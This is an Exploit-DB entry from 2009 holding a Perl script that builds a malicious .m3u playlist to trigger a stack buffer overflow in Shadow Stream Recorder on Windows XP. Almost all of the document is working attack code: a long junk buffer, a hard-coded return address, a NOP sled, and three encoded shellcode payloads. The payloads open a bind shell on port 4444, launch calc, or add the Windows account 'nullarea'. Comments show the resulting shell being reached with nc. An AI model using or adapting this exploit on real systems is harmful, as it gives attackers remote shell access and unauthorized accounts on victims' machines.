Shadow Stream Recorder - '.m3u' Universal Stack Overflow

EDB-ID:

8426

CVE:

N/A


Author:

AlpHaNiX

Type:

local


Platform:

Windows

Date:

2009-04-14


#!/usr/bin/perl
# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# program : Shadow Stream Recorder
# download : http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# program homepage : http://www.mini-stream.net/shadow-stream-recorder/
##########
# Exploit In Action :
#[!] usage :
#    ./sploit.pl bindshell
#    ./sploit.pl cmdexec
#    ./sploit.pl adduser
##########
# C:\>sploit.pl bindshell
#[!] Done
# C:\>nc localhost 4444
# Console - Windows Trust 3.0 (Service Pack 3: v5512)
#
#(C) 1985-2008 Microsoft Corp.
# Everything Tested Under Windows XP SP3 FR
# After Creating The File just open the program & drag and drop m3u evil file ! :)



sub help {print "[!] usage :   \n    ./sploit.pl bindshell \n    ./sploit.pl cmdexec \n    ./sploit.pl adduser \n " ;exit();}

&help
unless $ARGV[0];


my $sploit = $ARGV[0];
my $junk   = "http://"."A" x 26117;
my $ret    = "\x63\x46\x92\x7C";
my $nope   = "\x90" x 30;


# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $calc_shellcode =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
"\xac\x2c\xc9\x40" ;

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $bindshell =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x69".
"\x45\x3b\x07\x83\xeb\xfc\xe2\xf4\x95\x2f\xd0\x4a\x81\xbc\xc4\xf8".
"\x96\x25\xb0\x6b\x4d\x61\xb0\x42\x55\xce\x47\x02\x11\x44\xd4\x8c".
"\x26\x5d\xb0\x58\x49\x44\xd0\x4e\xe2\x71\xb0\x06\x87\x74\xfb\x9e".
"\xc5\xc1\xfb\x73\x6e\x84\xf1\x0a\x68\x87\xd0\xf3\x52\x11\x1f\x2f".
"\x1c\xa0\xb0\x58\x4d\x44\xd0\x61\xe2\x49\x70\x8c\x36\x59\x3a\xec".
"\x6a\x69\xb0\x8e\x05\x61\x27\x66\xaa\x74\xe0\x63\xe2\x06\x0b\x8c".
"\x29\x49\xb0\x77\x75\xe8\xb0\x47\x61\x1b\x53\x89\x27\x4b\xd7\x57".
"\x96\x93\x5d\x54\x0f\x2d\x08\x35\x01\x32\x48\x35\x36\x11\xc4\xd7".
"\x01\x8e\xd6\xfb\x52\x15\xc4\xd1\x36\xcc\xde\x61\xe8\xa8\x33\x05".
"\x3c\x2f\x39\xf8\xb9\x2d\xe2\x0e\x9c\xe8\x6c\xf8\xbf\x16\x68\x54".
"\x3a\x16\x78\x54\x2a\x16\xc4\xd7\x0f\x2d\x2a\x5b\x0f\x16\xb2\xe6".
"\xfc\x2d\x9f\x1d\x19\x82\x6c\xf8\xbf\x2f\x2b\x56\x3c\xba\xeb\x6f".
"\xcd\xe8\x15\xee\x3e\xba\xed\x54\x3c\xba\xeb\x6f\x8c\x0c\xbd\x4e".
"\x3e\xba\xed\x57\x3d\x11\x6e\xf8\xb9\xd6\x53\xe0\x10\x83\x42\x50".
"\x96\x93\x6e\xf8\xb9\x23\x51\x63\x0f\x2d\x58\x6a\xe0\xa0\x51\x57".
"\x30\x6c\xf7\x8e\x8e\x2f\x7f\x8e\x8b\x74\xfb\xf4\xc3\xbb\x79\x2a".
"\x97\x07\x17\x94\xe4\x3f\x03\xac\xc2\xee\x53\x75\x97\xf6\x2d\xf8".
"\x1c\x01\xc4\xd1\x32\x12\x69\x56\x38\x14\x51\x06\x38\x14\x6e\x56".
"\x96\x95\x53\xaa\xb0\x40\xf5\x54\x96\x93\x51\xf8\x96\x72\xc4\xd7".
"\xe2\x12\xc7\x84\xad\x21\xc4\xd1\x3b\xba\xeb\x6f\x99\xcf\x3f\x58".
"\x3a\xba\xed\xf8\xb9\x45\x3b\x07";


# win32_adduser -  PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com
my $add_user =
"\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xca".
"\x75\xb1\x0a\x83\xeb\xfc\xe2\xf4\x36\x9d\xf5\x0a\xca\x75\x3a\x4f".
"\xf6\xfe\xcd\x0f\xb2\x74\x5e\x81\x85\x6d\x3a\x55\xea\x74\x5a\x43".
"\x41\x41\x3a\x0b\x24\x44\x71\x93\x66\xf1\x71\x7e\xcd\xb4\x7b\x07".
"\xcb\xb7\x5a\xfe\xf1\x21\x95\x0e\xbf\x90\x3a\x55\xee\x74\x5a\x6c".
"\x41\x79\xfa\x81\x95\x69\xb0\xe1\x41\x69\x3a\x0b\x21\xfc\xed\x2e".
"\xce\xb6\x80\xca\xae\xfe\xf1\x3a\x4f\xb5\xc9\x06\x41\x35\xbd\x81".
"\xba\x69\x1c\x81\xa2\x7d\x5a\x03\x41\xf5\x01\x0a\xca\x75\x3a\x62".
"\xf6\x2a\x80\xfc\xaa\x23\x38\xf2\x49\xb5\xca\x5a\xa2\x85\x3b\x0e".
"\x95\x1d\x29\xf4\x40\x7b\xe6\xf5\x2d\x16\xdc\x6e\xe4\x10\xc9\x6f".
"\xea\x5a\xd2\x2a\xa4\x10\xc5\x2a\xbf\x06\xd4\x78\xea\x1b\xc4\x66".
"\xa6\x14\xc3\x6f\xab\x55\xd0\x66\xba\x1d\xd0\x64\xa3\x0d\x91\x25".
"\x8b\x31\xf5\x2a\xec\x53\x91\x64\xaf\x01\x91\x66\xa5\x16\xd0\x66".
"\xad\x07\xde\x7f\xba\x55\xf0\x6e\xa7\x1c\xdf\x63\xb9\x01\xc3\x6b".
"\xbe\x1a\xc3\x79\xea\x1b\xc4\x66\xa6\x14\xc3\x6f\xab\x55\x9e\x4b".
"\x8e\x31\xb1\x0a";

if ($sploit eq 'bindshell')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done \n";}

elsif ($sploit eq 'cmdexec')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done \n"}

elsif ($sploit eq 'adduser')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done \n"}

else {&help}

# milw0rm.com [2009-04-14]